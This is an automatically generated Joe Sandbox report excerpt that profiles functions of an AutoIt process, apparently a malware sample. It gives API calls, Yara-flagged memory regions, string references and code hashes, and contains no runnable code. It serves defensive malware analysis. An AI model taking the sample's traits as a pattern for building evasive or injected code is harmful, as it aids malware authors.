Part of subcall function 00C62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00C69C54,00000000,00C68D5D,00C659C3), ref: 00C62F99
Part of subcall function 00C62F85: GetLastError.KERNEL32(00000000,?,00C69C54,00000000,00C68D5D,00C659C3), ref: 00C62FAB

_free.LIBCMT ref: 00CA92E7
_free.LIBCMT ref: 00CA92F9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 85da671c8de961f893da3283a47acd3f554561602834b66e6697d9ff4826b212
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: D6E0C2A1204A2353CA30A5B86881F8377FCCFC8711714060DB41AD3142CE38E8409028

Function 00C45E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C7E234

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: cc8f6659b88a8a67573e17d3b76e9adb8a2ecd57a61d0df521179a512d70c941
Instruction ID: c7ec025e783d767b5ee6ff820494c92e52b131e74a58f6695dbc70fe7b04beb2
Opcode Fuzzy Hash: cc8f6659b88a8a67573e17d3b76e9adb8a2ecd57a61d0df521179a512d70c941
Instruction Fuzzy Hash: 3B324774508341DFDB24DF14C494A2ABBE1BF89304F14896DF89A9B362D731ED85EB82

Function 00C548B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C548FA

Strings

EA06, xrefs: 00C908A1

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: e4c7412afc5d09ac54237e717a9bc833a7546fb416d85dfe160022b3385b786b
Instruction ID: 1fba644b9723bb1add5c990003a468b9b98f117d5904a1e3716103ca9488e553
Opcode Fuzzy Hash: e4c7412afc5d09ac54237e717a9bc833a7546fb416d85dfe160022b3385b786b
Instruction Fuzzy Hash: 8841BF25A041585FDF299B5488477BF7FA9CF4130AF284074EC82E7287D5208ECC93E9

Function 047221B8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,?,?,0470AD04,00000000,0470B1B3,?,?,00000000,00000000), ref: 047221FA

Strings

GetFileAttributesA, xrefs: 047221DE

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: GetFileAttributesA
API String ID: 3188754299-811605020
Opcode ID: a10d6d65a25e73ebf5c31a748d907d2bbc6fcbbc7827d747f8b9cbe766ea4448
Instruction ID: bb584ab9df64e31b9b600db8f7a5ce910cccc37db6bbf1511b4fe75622cfdd55
Opcode Fuzzy Hash: a10d6d65a25e73ebf5c31a748d907d2bbc6fcbbc7827d747f8b9cbe766ea4448
Instruction Fuzzy Hash: 91F0AF70600314AFD711DFF8DF99A5A73E8EB18714B9249B4E51092652E6B6FE00DA14

Function 04721D00 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000002,04721EBC,?,?,?,?,00000000,00000000,?,04721E80,00000000,00000000,00000002,00000000), ref: 04721D30

Strings

CreateFileA, xrefs: 04721D0C

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: CreateFileA
API String ID: 823142352-1429953656
Opcode ID: c71a47317b6d46e7ba24d680841f89f75b6c638f192cf49a307825a20a680eb6
Instruction ID: 6a411df809a22008c76fd5b5d9f4759cf5f9e8180a6287b8c4fc27df8ff684ae
Opcode Fuzzy Hash: c71a47317b6d46e7ba24d680841f89f75b6c638f192cf49a307825a20a680eb6
Instruction Fuzzy Hash: 1CE012772002187B9700C99AEC88C97B7BDEEC9660714C519B608C7211D6B0EC018BB0

Function 04721A5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(00000000,00000000,?,00000001,04721526,0471DFB4,00000000,00000000,00000002,00000000,00000000,00000000,00000002,00000000,0471E2FB,00000000), ref: 04721A75

Strings

TerminateProcess, xrefs: 04721A62

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID: TerminateProcess
API String ID: 560597551-2873147277
Opcode ID: f1ba4307bdaaa80570f205df43c5317afaf56ee4255dcd445026802fa1b0eff2
Instruction ID: 5186850f0ad001213b98f0f861000b0d17773b1be305f336d2bea0f00f55caef
Opcode Fuzzy Hash: f1ba4307bdaaa80570f205df43c5317afaf56ee4255dcd445026802fa1b0eff2
Instruction Fuzzy Hash: C5C04CB36013247FA71096F9AC8CCE7679CEA4D1A13044591B615C7212D6E95D008BA0

Function 00CA7D6E Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA7E96

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d5be960dd17211be7082cf3c9a80b3eb395f413bb59f7f580bb8ea8cc0788b9e
Instruction ID: eddfbce815b542704e52b1df4d9ddebea81ee6841024ecf4c701da53c8d62efd
Opcode Fuzzy Hash: d5be960dd17211be7082cf3c9a80b3eb395f413bb59f7f580bb8ea8cc0788b9e
Instruction Fuzzy Hash: 4941F77250820AAFC720EFA8CCC1D7EB7A8FF1A344B284699F555D7281DB319D01EB60

Function 00C55F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C55FEF

Part of subcall function 00C6359C: __lock.LIBCMT ref: 00C635A2
Part of subcall function 00C6359C: DecodePointer.KERNEL32(00000001,?,00C56004,00C98892), ref: 00C635AE
Part of subcall function 00C6359C: EncodePointer.KERNEL32(?,?,00C56004,00C98892), ref: 00C635B9

Part of subcall function 00C55F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C55F18
Part of subcall function 00C55F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C55F2D

Part of subcall function 00C55240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5526C
Part of subcall function 00C55240: IsDebuggerPresent.KERNEL32 ref: 00C5527E
Part of subcall function 00C55240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00C552E6
Part of subcall function 00C55240: SetCurrentDirectoryW.KERNEL32(?), ref: 00C55366

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C5602F

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: aca25de81ebe25e84a52b46219414c70f76c212f3527306da3198d867d24a7bd
Instruction ID: b39ea46d1816fad6a439e394c7cab0b8ec8b3d8d81f30da8a8801f241b21c828
Opcode Fuzzy Hash: aca25de81ebe25e84a52b46219414c70f76c212f3527306da3198d867d24a7bd
Instruction Fuzzy Hash: 2B115C719083019BC710DF79ED45A0EBBE8FF98710F50451EF4998B2B1DB70A588DBAA

Function 00C542F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C53E72,?,?,?,00000000), ref: 00C54327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00C53E72,?,?,?,00000000), ref: 00C90717

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9d59f59fda0a46f8a00416a1ad9f728afae913a744b686ba9e0cdbff0e4ca7d8
Instruction ID: 1a65d0d92d2b6fd42af818f7c581b5838f3f7b60e959fc54b55fd99f982b18cb
Opcode Fuzzy Hash: 9d59f59fda0a46f8a00416a1ad9f728afae913a744b686ba9e0cdbff0e4ca7d8
Instruction Fuzzy Hash: 87018474144209BEF7240E148C8AF667B9CAB0176DF10C219BEE46A1F0C6B05DC9DB18

Function 00C60FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C6593C: __FF_MSGBANNER.LIBCMT ref: 00C65953
Part of subcall function 00C6593C: __NMSG_WRITE.LIBCMT ref: 00C6595A
Part of subcall function 00C6593C: RtlAllocateHeap.NTDLL(01750000,00000000,00000001,?,00000004,?,?,00C61003,?), ref: 00C6597F

std::exception::exception.LIBCMT ref: 00C6101C
__CxxThrowException@8.LIBCMT ref: 00C61031

Part of subcall function 00C687CB: RaiseException.KERNEL32(?,?,?,00CFCAF8,?,?,?,?,?,00C61036,?,00CFCAF8,?,00000001), ref: 00C68820

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 3a79cbca0233027cd2da6b4988e1c0e0139e1f1502145fdc5b99fd63deec018e
Instruction ID: ad5f2ff575094cf2183601f0841ddb2305662522a2caeb445091c63f5a2530d6
Opcode Fuzzy Hash: 3a79cbca0233027cd2da6b4988e1c0e0139e1f1502145fdc5b99fd63deec018e
Instruction Fuzzy Hash: D6F0287460421DB6CF30BB98DD819DE77AC9F01311F240466FD14A2281DFB09B84E6E2

Function 00C6581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C6584C
__lock_file.LIBCMT ref: 00C6586D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 8111d9c02392fb018029d729744089192a507f592ab24d86e2ca58f184c7a6f7
Instruction ID: 6b83983b023653dbcda4f430e4ee07ba1db8d654ca9905a583d019f9c7f2d45a
Opcode Fuzzy Hash: 8111d9c02392fb018029d729744089192a507f592ab24d86e2ca58f184c7a6f7
Instruction Fuzzy Hash: 10014471840749EBCF31AFAACC8599E7B61AF84360F244215B9245B1E1D7318A25EF91

Function 00C655C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C68D58: __getptd_noexit.LIBCMT ref: 00C68D58

__lock_file.LIBCMT ref: 00C6560B

Part of subcall function 00C66E3E: __lock.LIBCMT ref: 00C66E61

__fclose_nolock.LIBCMT ref: 00C65616

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 30cf8834310ba4da2d7b39683ca359883a8cdae4d58d8766e5a09af0e2f4480e
Instruction ID: b414dd6b36fc4e13b94fa40395024f10996f6475661ea87b22a6a337e4179715
Opcode Fuzzy Hash: 30cf8834310ba4da2d7b39683ca359883a8cdae4d58d8766e5a09af0e2f4480e
Instruction Fuzzy Hash: DBF0B471901B059BD7306B75C88676E77A16F40330F318209B525AB1C1CB7C8A05AF52

Function 00C65E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C65EB4
__ftell_nolock.LIBCMT ref: 00C65EBF

Part of subcall function 00C68D58: __getptd_noexit.LIBCMT ref: 00C68D58

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 085f9ca1030d35bf781f8b986d79809cb05d460fc2dea0722c361a05b42f10a2
Instruction ID: 3682292f40d1da255ff03864228f447f753aa129e65b5b2ebbc1f03734e6a05e
Opcode Fuzzy Hash: 085f9ca1030d35bf781f8b986d79809cb05d460fc2dea0722c361a05b42f10a2
Instruction Fuzzy Hash: B0F0A7319116199BDB30BB74898276E72906F41331F214306B120AB1C2CF7D4E06BB66

Function 046F4AD4 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 046F49EE
SysAllocStringLen.OLEAUT32(?,?), ref: 046F4ADF
SysFreeString.OLEAUT32(00000000), ref: 046F4AF1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0a60f8c0ed1e703f84daa18d4e57613ed1a0fa03695e0a97a9536ff477675d6c
Instruction ID: 3b12a03f554fc2efd798075f2cbab251d761dacd839c9bbd571233fd885a01a8
Opcode Fuzzy Hash: 0a60f8c0ed1e703f84daa18d4e57613ed1a0fa03695e0a97a9536ff477675d6c
Instruction Fuzzy Hash: 9AC0807C3012019DFF046FB05D455BB1758AD73244340009C9F81C4E00F925FC81543C

Function 017989B9 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,01798D4C), ref: 017989E8
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,01798D4C), ref: 01798A0F

Memory Dump Source

Source File: 00000008.00000002.2390371860.0000000001795000.00000040.00000020.00020000.00000000.sdmp, Offset: 01795000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1795000_Autoit3.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: ecc889cf491ccd5692baa52f1ab7082a5c06ab9237b386f74195cecb8df78ce7
Instruction ID: c6cb893d5454c6f82317ba3e791fc062a931c034c58588022ac24cdeeb829fd6
Opcode Fuzzy Hash: ecc889cf491ccd5692baa52f1ab7082a5c06ab9237b386f74195cecb8df78ce7
Instruction Fuzzy Hash: 6BF0E272E0022517EF2099A96C88B56D984DB877A0F140070FA48EF2CDD6A1880843A3

Function 046F15C8 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,046F195B), ref: 046F15F7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,046F195B), ref: 046F161E

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 53a3fc01edbb4ebf38df8be5cc2b0bfabe9c89e15cf5c8eb05f4eff4ac36ef4d
Instruction ID: 3e4c9bed2a36f805500054f911372d7662fd09b2843d1d2ca3f48e993950e2fe
Opcode Fuzzy Hash: 53a3fc01edbb4ebf38df8be5cc2b0bfabe9c89e15cf5c8eb05f4eff4ac36ef4d
Instruction Fuzzy Hash: BDF089B3B0062097EB205B694C81F9655859B577D4F1501B5FBC8EF3C8E552AC014794

Function 00C4A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b71f414e7479362dc46c64594bac72ee9d285c8d0e30942547ccbdf5b3df5b6a
Instruction ID: 614cd1486f5d299cfdfa710d1100567c449e2cf10e83effbb58990feeb285255
Opcode Fuzzy Hash: b71f414e7479362dc46c64594bac72ee9d285c8d0e30942547ccbdf5b3df5b6a
Instruction Fuzzy Hash: 0261DE74A40206DFDB14EF50C885B7ABBE5FF08314F15802EE9269B291D774EE81CB52

Function 00C4D679 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc3705c3d7f68d12f8881bc8ed5df9cc27807642504fa0122df8ae1ed949d5b
Instruction ID: 150f452e51e7de7fc9e8ca2b969cf06d5df18397a25d9b7de7e99b7a94616aa6
Opcode Fuzzy Hash: cbc3705c3d7f68d12f8881bc8ed5df9cc27807642504fa0122df8ae1ed949d5b
Instruction Fuzzy Hash: 8051BF35600604ABCF14FB68C995FAE77B6AF45354F148168F816AB382CB30EE45EB45

Function 047211B8 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0472138C

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 1af49ab782537bddec70617f94e4ce8c15d0bfe519916862ef5567e6ef4fc210
Instruction ID: 2c023746961ab51b9746579f8960a57831b475c8f050d8c09d2e2e3a14bac544
Opcode Fuzzy Hash: 1af49ab782537bddec70617f94e4ce8c15d0bfe519916862ef5567e6ef4fc210
Instruction Fuzzy Hash: 47511C35A0015D9BEF00FBA0DA849CEB3B6FF54308FA08565E540AB725EB74BE468F54

Function 00C5410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00C541B2

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3077df1db3e7e3d7cd694bb81784d55018af98f1624641290046ace69eec339f
Instruction ID: f61a4a4aabe966a03e298a02ffd7a7c207d2ab8df389b6be1a32a362abeccc2c
Opcode Fuzzy Hash: 3077df1db3e7e3d7cd694bb81784d55018af98f1624641290046ace69eec339f
Instruction Fuzzy Hash: DE315C75A00A16AFCB18CF2DC88469EB7B1FF54315F148619EC1593710D770A9E4CB94

Function 00C60E38 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 00C60EE7

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a5894fb16e9b965520445c465a76a637ca88093dd3e9c8c0a462675471c4b99e
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9E31E470A00119DFC728DF59C4C096AF7A6FF59300B748AA5E459EB252E732EEC1CB80

